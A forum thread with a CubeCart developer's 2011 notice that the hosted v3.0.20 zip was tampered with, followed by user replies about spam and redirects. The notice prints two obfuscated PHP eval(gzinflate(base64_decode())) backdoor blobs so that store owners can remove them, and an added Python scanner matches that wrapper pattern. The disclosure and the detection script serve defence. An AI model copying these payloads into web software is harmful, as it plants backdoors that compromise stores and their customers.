Al Brookbanks Posted February 8, 2011

Over the last week it has been brought to our attention that a number of CubeCart v3 stores have been hacked. After careful examination it became apparent that the 3.0.20 zip file that was hosted on our server had been compromised. Someone had modified this zip file to include a number of pieces of malicious code into a handful of the files....

We expect that the file was compromised from around November 2010 but we can't be sure. As from today the package has been cleaned up and given an MD5 checksum which can be used to verify it in the future.

Since November our server underwent some software upgrades to achieve PCI compliance and our helpdesk software managing the package has been upgraded. For this reason we are fairly confident any backdoors have been closed and the file should not be tampered with again.

If you installed CubeCart v3 onto your web hosting account by downloading it from our server please check the following pieces of code are removed from your store if present:

Remove the file:

images/random/chars/T.php

Open the file below (if it exists) and remove the following code from around line 319:

install/index.php

```php
<?php eval (gzinflate(base64_decode(
'lVZdc6JIFP0rW6l9mHlD0FEqk001oEgTPpQPgZctoB1AQDpi0sKvX/BrIGMl64NV'
.'on1Pn3vuuad4/ufnM47xX38XTw8LAIBWx0zAhKpEw1cvH+1gXWwlYIBAzAoklmBq'
.'oQiYU+yJ8askEBVIYOPnkEKiF7mRFAeMWqOaKuQGS+JDDCvVtafQtixoOzynW4QD'
.'1gC5JhVbVsX5wMXWcmZr9kDhgB3DZYp5aVZMI5FNvFxNkLOYRouGQTqSFwleApV7'
.'88WUhbWL1QpwCz7NVowd+IbFr/kUStNl4Ttq4jfNhBU2f21RohuodrdsLYts7WcA'
.'+OTlHZKXV7TyMBJnCTIw76+WBQDcJsizqDlPh3lcu7nyihj7DVAcDmkv82lpCsmP'
.'+OXACXIVRgsxijQAdpBMMiCDlyU/nAhmNHp4XL/72bfAL9c/hv+idVig9bcHKB7K'
.'QKCIRtu0uyKFm89qz3Qph15mLs2mnhElRoqGIQ3n67maLJmGQfs84ExPzLzVdFSa'
.'OTa8DM/tHCdKBktji2vdkLBslmkgElYR9hnKZ6XML8ugve/y4W9iM5pVVJqT+Qta'
.'YaQkxVp1qtNNMIbnWt1Uxp7jxQ1G2sMUSSGleI7qTL5y7eAblGqgdG+FNZXIRnrF'
.'O/Esr1i68QG3vWdWHhwjnehChOWq30vb26qGSDbv6vX43HJVqCFx6cEwECF26/AD'
.'t+OMDuqm7HAirJRIYy9nK/nKm0x6NWc9oEgaDbOxv3KLD5iswme/7xGo/v/H2kNw'
.'+U2u9k1/ZKLxHW58yX5dU/a01M0prTED7CW/NYYbbqgJgFz5/E8u6oVLw+Oj5seZ'
.'XOY0o7C+GVLNfK73ys7Jn5/W8eWumXmuzCPiJelOqfd5wEhnbh3PCKTFOutCdnKV'
.'dnsOOj7bnb8j3ejcO+toxFMnfmcOTle/s96NflkwV7N1e+bOuck1dcvbFw/t5AGF'
.'5bqZEe29h5cZtRlx2cNWL6H8or8jzqfeaHS97nars9bZqRNHMv7lnPrs4qy655re'
.'ejrenl/H42TS+K+/Wzy1b/W8c2+nijjylDwe9fPu4ot7cmBBfJsbGY59M7PcVN0q'
.'6QD7t3Lhyxwg45PPuxyG7B850c/RnnecZjcVIcT3aaRQmoX/zDrm0x4Fn7Ghv4mx'
.'yYTsSdNbOjZ5Rp6eHr5/f9yt92+77eNz88LwHw=='
))); ?>
```

Open the files below and remove the following code from the top:

includes/boxes/siteDocs.inc.php
language/nl/lang.inc.php

```php
<?php eval (gzinflate(base64_decode(
's7ezsS/IKFBwKEgsLi7JKCrVUIl3dw2JVi/OzcxJVY/VtLa34+WCqsnMS84pTUnF'
.'pyS1LDEHi7yNPQA=' ))); ?>
```

We sincerely apologise for any inconvenience that this may have caused.

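
A read-only check for the indicators listed in the post above, as an added example that is not part of the original post or CubeCart's own code: it looks for the dropped file and for the `eval (gzinflate(base64_decode(` wrapper, without decoding or executing anything. The function names and the constructed sample tree are assumptions made for illustration.

```python
import re
import sys
from pathlib import Path

# File the advisory says to delete, relative to the store root.
DROPPED_FILE = "images/random/chars/T.php"

# eval(gzinflate(base64_decode( with optional whitespace or newlines between
# tokens; PHP function names are case-insensitive, so match that way too.
WRAPPER = re.compile(rb"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(", re.I)


def scan_store(root):
    """Return sorted (relative_path, line, reason) findings; line 0 = whole file."""
    root = Path(root)
    findings = []
    if (root / DROPPED_FILE).is_file():
        findings.append((DROPPED_FILE, 0, "dropped file present"))
    for path in root.rglob("*.php"):
        if not path.is_file():
            continue
        data = path.read_bytes()
        rel = path.relative_to(root).as_posix()
        for m in WRAPPER.finditer(data):
            line = data.count(b"\n", 0, m.start()) + 1
            findings.append((rel, line, "eval/gzinflate/base64_decode wrapper"))
    return sorted(findings)


def build_constructed_store(root):
    """Write a constructed tree (stand-ins, not real CubeCart files or payloads)."""
    files = {
        "index.php": "<?php echo 'clean'; ?>\n",
        "includes/boxes/siteDocs.inc.php":
            "<?php eval (gzinflate(base64_decode(\n'QUJD' ))); ?>\n<?php // box\n",
        "install/index.php":
            "// filler\n" * 318 + "EVAL(GZINFLATE(BASE64_DECODE('QUJD')));\n",
        DROPPED_FILE: "<?php // constructed stand-in\n",
    }
    for rel, text in files.items():
        target = Path(root) / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(text)


if __name__ == "__main__":
    for rel, line, reason in scan_store(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{rel}:{line}: {reason}")
```

A hit on the wrapper is a lead for manual review of that file, since the pattern alone does not show where the code came from.
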
Guest blackerutuf Posted March 29, 2011

I have been having problems with the version 3.0.10, where someone has been sending mass emails on my account. Has anyone else had similar problems and been able to overcome it?

Robsta Posted April 1, 2011

> I have been having problems with the version 3.0.10, where someone has been sending mass emails on my account. Has anyone else had similar problems and been able to overcome it?

Disable tell-a-friend, or enable Flood Control. You really should upgrade to the latest release of v3 before it's discontinued.

Guest v3lady Posted September 4, 2011

Hi, I've just discovered that I have this problem and I've applied all the amends above. However my "forgot password" code still leads directly to fbi.gov. Any clues?

detectorman Posted September 9, 2011

Hi All,

Sorry to ask this but I cannot see the v3.0.20 download link in my dashboard. Is this version still available for download?

Thanks
Dave

Robsta Posted September 9, 2011

> Hi All, Sorry to ask this but I cannot see the v3.0.20 download link in my dashboard. Is this version still available for download? Thanks Dave

No, it's been discontinued.

gypsy1968 Posted January 7, 2012

At this stage, if I am ok thus far do I need to upgrade? I did have a challenge where mass emails were being sent and my host disabled the tell-a-friend mod but we had not known about this. Thanks!